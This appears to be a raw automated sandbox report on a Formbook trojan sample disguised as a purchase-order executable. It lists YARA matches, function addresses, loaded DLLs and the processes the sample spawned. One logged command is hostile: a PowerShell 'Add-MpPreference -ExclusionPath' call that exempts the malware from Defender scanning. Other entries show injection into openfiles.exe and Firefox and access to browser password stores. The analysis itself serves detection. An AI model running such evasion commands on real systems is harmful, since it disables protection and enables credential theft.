            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0494F7B08_2_0494F7B0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048970C08_2_048970C0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0493F0CC8_2_0493F0CC
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0494F0E08_2_0494F0E0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_049470E98_2_049470E9
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0489B1B08_2_0489B1B0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048C516C8_2_048C516C
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0487F1728_2_0487F172
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0495B16B8_2_0495B16B
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048952A08_2_048952A0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048AB2C08_2_048AB2C0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_049312ED8_2_049312ED
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048D739A8_2_048D739A
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0494132D8_2_0494132D
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0487D34C8_2_0487D34C
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0494FCF28_2_0494FCF2
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04909C328_2_04909C32
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048AFDC08_2_048AFDC0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04893D408_2_04893D40
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04941D5A8_2_04941D5A
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04947D738_2_04947D73
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04899EB08_2_04899EB0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04891F928_2_04891F92
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0494FFB18_2_0494FFB1
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04853FD58_2_04853FD5
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04853FD28_2_04853FD2
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0494FF098_2_0494FF09
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048938E08_2_048938E0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048FD8008_2_048FD800
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_049259108_2_04925910
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048999508_2_04899950
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048AB9508_2_048AB950
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048D5AA08_2_048D5AA0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04931AA38_2_04931AA3
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0492DAAC8_2_0492DAAC
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0493DAC68_2_0493DAC6
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04947A468_2_04947A46
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0494FA498_2_0494FA49
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04903A6C8_2_04903A6C
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048AFB808_2_048AFB80
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_04905BF08_2_04905BF0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_048CDBF98_2_048CDBF9
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0494FB768_2_0494FB76
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_028213408_2_02821340
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0281A7B08_2_0281A7B0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0281C7308_2_0281C730
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0281C5098_2_0281C509
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0281C5108_2_0281C510
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_02822E8E8_2_02822E8E
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_02822E908_2_02822E90
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_02839E308_2_02839E30
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: String function: 0162B970 appears 280 times
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: String function: 016AEA12 appears 86 times
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: String function: 01687E54 appears 111 times
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: String function: 016BF290 appears 105 times
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: String function: 01675130 appears 58 times
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 048FEA12 appears 86 times
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 0490F290 appears 105 times
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 0487B970 appears 280 times
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 048D7E54 appears 111 times
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 048C5130 appears 58 times
            Source: PO Copy_7854569.exe, 00000000.00000002.2000322290.00000000075B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PO Copy_7854569.exe
            Source: PO Copy_7854569.exe, 00000000.00000002.1981785201.000000000137E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO Copy_7854569.exe
            Source: PO Copy_7854569.exe, 00000000.00000002.1985288574.00000000031D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs PO Copy_7854569.exe
            Source: PO Copy_7854569.exe, 00000000.00000002.2000181875.0000000007560000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs PO Copy_7854569.exe
            Source: PO Copy_7854569.exe, 00000000.00000002.2003385709.0000000007EF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PO Copy_7854569.exe
            Source: PO Copy_7854569.exe, 00000006.00000002.2120087862.00000000010FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameopnfiles.exej% vs PO Copy_7854569.exe
            Source: PO Copy_7854569.exe, 00000006.00000002.2120087862.00000000010D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameopnfiles.exej% vs PO Copy_7854569.exe
            Source: PO Copy_7854569.exe, 00000006.00000002.2120419715.000000000172D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO Copy_7854569.exe
            Source: PO Copy_7854569.exeBinary or memory string: OriginalFilenamegTWh.exeJ vs PO Copy_7854569.exe
            Source: PO Copy_7854569.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 6.2.PO Copy_7854569.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 6.2.PO Copy_7854569.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2120310446.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.4442575534.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2122191823.0000000002E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: PO Copy_7854569.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, sAQsu8yt6lLQbnQvsb.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, sAQsu8yt6lLQbnQvsb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, sAQsu8yt6lLQbnQvsb.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, EMiiKLWxXWlFcu6Hvp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, EMiiKLWxXWlFcu6Hvp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, sAQsu8yt6lLQbnQvsb.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, sAQsu8yt6lLQbnQvsb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, sAQsu8yt6lLQbnQvsb.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.PO Copy_7854569.exe.7680000.10.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.PO Copy_7854569.exe.357b6e0.6.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.PO Copy_7854569.exe.322382c.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.PO Copy_7854569.exe.3213820.5.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/7@23/10
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO Copy_7854569.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbsyqs0r.n3f.ps1Jump to behavior
            Source: PO Copy_7854569.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: PO Copy_7854569.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: openfiles.exe, 00000008.00000003.2570582633.0000000002B89000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000003.2573170813.0000000002BB3000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000003.2570681130.0000000002BAA000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4439171150.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4439171150.0000000002BAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO Copy_7854569.exeVirustotal: Detection: 45%
            Source: PO Copy_7854569.exeReversingLabs: Detection: 68%
            Source: unknownProcess created: C:\Users\user\Desktop\PO Copy_7854569.exe "C:\Users\user\Desktop\PO Copy_7854569.exe"
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess created: C:\Users\user\Desktop\PO Copy_7854569.exe "C:\Users\user\Desktop\PO Copy_7854569.exe"
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess created: C:\Users\user\Desktop\PO Copy_7854569.exe "C:\Users\user\Desktop\PO Copy_7854569.exe"
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeProcess created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"
            Source: C:\Windows\SysWOW64\openfiles.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess created: C:\Users\user\Desktop\PO Copy_7854569.exe "C:\Users\user\Desktop\PO Copy_7854569.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess created: C:\Users\user\Desktop\PO Copy_7854569.exe "C:\Users\user\Desktop\PO Copy_7854569.exe"Jump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeProcess created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeSection loaded: mswsock.dllJump to behavior
